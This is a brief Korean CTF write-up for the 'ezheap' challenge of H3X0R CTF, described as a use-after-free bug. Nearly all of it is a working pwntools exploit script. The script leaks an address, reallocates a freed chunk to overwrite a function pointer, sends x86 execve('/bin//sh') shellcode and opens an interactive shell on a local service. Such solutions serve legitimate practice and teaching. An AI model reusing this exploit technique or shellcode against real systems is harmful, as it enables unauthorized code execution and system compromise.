H3X0R CTF ezheap

후기 : free후 같은크기 재할당을 통해 함수포인터를 덮어 익스플로잇하는

uaf 문제였다.

from pwn import *
s = remote('localhost', 4000)

print s.recvuntil('0x')
leak = int(s.recvuntil('\n')[:-1],16)
log.info('leak : ' + hex(leak))

print s.recvuntil('>>> ')
s.sendline('4')
print s.recvuntil('Do You Want To Exit?')
s.sendline('7')

print s.recvuntil('>>> ')
s.sendline('3')

payload = p32(leak + 4)
payload += '\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80'
s.sendline(payload)

print s.recvuntil('>>> ')
s.sendline('1')
s.interactive()